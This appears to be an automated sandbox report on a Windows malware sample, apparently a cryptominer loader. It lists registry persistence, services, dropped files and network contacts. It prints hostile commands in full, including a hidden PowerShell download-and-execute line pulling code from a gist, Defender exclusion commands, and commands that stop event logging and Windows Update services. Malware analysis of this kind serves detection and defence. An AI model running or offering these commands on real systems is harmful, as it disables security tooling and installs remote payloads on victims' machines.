Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Userinit' = '<SYSTEM32>\userinit.exe,<SYSTEM32>\ShellProtection.exe'
Sets the following service settings
- [HKLM\SYSTEM\CurrentControlSet\Services\VulnDrv] 'Start' = '00000002'
- [HKLM\SYSTEM\CurrentControlSet\Services\VulnDrv] 'ImagePath' = '<DRIVERS>\vulndriver.sys'
- [HKLM\SYSTEM\CurrentControlSet\Services\Q6NBE8XO] 'Start' = '00000002'
- [HKLM\SYSTEM\CurrentControlSet\Services\Q6NBE8XO] 'ImagePath' = '%ALLUSERSPROFILE%\j8zbv1x1inu6\ggxttramu14w.exe'
Creates the following services
- 'VulnDrv' <DRIVERS>\vulndriver.sys
- 'Q6NBE8XO' %ALLUSERSPROFILE%\j8zbv1x1inu6\ggxttramu14w.exe
Malicious functions
To complicate detection of its presence in the operating system,
blocks the following features:
- Windows Event Logging
adds antivirus exclusion:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '<SYSTEM32>' -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionPath '<DRIVERS>' -ErrorAction SilentlyContinue"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Injects code into
the following system processes:
- <SYSTEM32>\conhost.exe
- <SYSTEM32>\dwm.exe
Terminates or attempts to terminate
the following system processes:
- <SYSTEM32>\securityhealthservice.exe
- <SYSTEM32>\securityhealthsystray.exe
Modifies file system
Creates the following files
- %TEMP%\loader.exe
- %TEMP%\smss.exe
- %TEMP%\axactt.exe
- <DRIVERS>\vulndriver.sys
- <SYSTEM32>\shellprotection.exe
- %ALLUSERSPROFILE%\j8zbv1x1inu6\ggxttramu14w.exe
- %WINDIR%\temp\__psscriptpolicytest_wtztbcte.5y5.ps1
- %WINDIR%\temp\__psscriptpolicytest_aasuiqmc.ip5.psm1
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-43-546.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-43-812.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-43-904.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-043.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-074.dump
- %WINDIR%\temp\__psscriptpolicytest_pmx0dmhj.isz.ps1
- %WINDIR%\temp\__psscriptpolicytest_1hqxoanm.oxk.psm1
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-208.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-229.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-271.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-344.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-440.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-512.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-611.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-642.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-661.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-684.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-715.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-736.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-44-757.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-45-177.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-45-234.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-45-263.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-45-265.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-45-297.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-45-328.dump
- %WINDIR%\temp\content\5296-3632-powershell.exe-21-15-45-380.dump
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\powershell\startupprofiledata-noninteractive
- %WINDIR%\temp\wspodbjupgjv.sys
- %LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\axactt.exe.log
- %ALLUSERSPROFILE%\microsoft\windows security health\logs\shs-06252026-211635-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl
Deletes following files that it created itself
- %WINDIR%\temp\__psscriptpolicytest_wtztbcte.5y5.ps1
- %WINDIR%\temp\__psscriptpolicytest_aasuiqmc.ip5.psm1
- %WINDIR%\temp\__psscriptpolicytest_pmx0dmhj.isz.ps1
- %WINDIR%\temp\__psscriptpolicytest_1hqxoanm.oxk.psm1
- %TEMP%\loader.exe
- %TEMP%\smss.exe
- %TEMP%\axactt.exe
Network activity
Connects to
- 'gi##.###hubusercontent.com':443
- 'x1.#.lencr.org':80
- 'ra#.####ubusercontent.com':443
- 'ip##pi.com':80
- 'dc##.#teelproxy.com':3071
- 'di##ord.com':443
- 'po##.#upportxmr.com':443
TCP
HTTP GET requests
- http://x1.#.lencr.org/
- http://ip##pi.com/json/
Other
- 'gi##.###hubusercontent.com':443
- 'dc##.#teelproxy.com':3071
- 'di##ord.com':443
- 'po##.#upportxmr.com':443
UDP
- DNS ASK gi##.###hubusercontent.com
- DNS ASK x1.#.lencr.org
- DNS ASK ra#.####ubusercontent.com
- DNS ASK ip##pi.com
- DNS ASK dc##.#teelproxy.com
- DNS ASK di##ord.com
- DNS ASK po##.#upportxmr.com
Miscellaneous
Creates and executes the following
- '%TEMP%\loader.exe'
- '%TEMP%\smss.exe'
- '%TEMP%\axactt.exe'
- '<SYSTEM32>\shellprotection.exe'
- '%ALLUSERSPROFILE%\j8zbv1x1inu6\ggxttramu14w.exe'
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "irm https://gist.githubusercontent.com/Relagg/801c6a4b2bef483c8ed42705c421109f/raw/6fb4cfc8cfb2cc4baac1d74e677d862fd005b8d5/ | i...
- '<SYSTEM32>\cmd.exe' /c wusa /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\sc.exe' stop UsoSvc
- '<SYSTEM32>\sc.exe' stop WaaSMedicSvc
- '<SYSTEM32>\wusa.exe' /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\sc.exe' stop bits
- '<SYSTEM32>\sc.exe' stop dosvc
- '<SYSTEM32>\powercfg.exe' /x -hibernate-timeout-ac 0
- '<SYSTEM32>\powercfg.exe' /x -hibernate-timeout-dc 0
- '<SYSTEM32>\powercfg.exe' /x -standby-timeout-ac 0
- '<SYSTEM32>\powercfg.exe' /x -standby-timeout-dc 0
- '<SYSTEM32>\sc.exe' delete "Q6NBE8XO"
- '<SYSTEM32>\sc.exe' create "Q6NBE8XO" binpath= "%ALLUSERSPROFILE%\j8zbv1x1inu6\ggxttramu14w.exe" start= "auto"
- '<SYSTEM32>\sc.exe' stop eventlog
- '<SYSTEM32>\sc.exe' start "Q6NBE8XO"
- '<SYSTEM32>\conhost.exe'
- '<SYSTEM32>\dwm.exe'
- '<SYSTEM32>\securityhealthservice.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "irm https://gist.githubusercontent.com/Relagg/801c6a4b2bef483c8ed42705c421109f/raw/6fb4cfc8cfb2cc4baac1d74e677d862fd005b8d5/ | i...' (with hidden window)
- '<SYSTEM32>\shellprotection.exe' ' (with hidden window)
- '<SYSTEM32>\dwm.exe' ' (with hidden window)
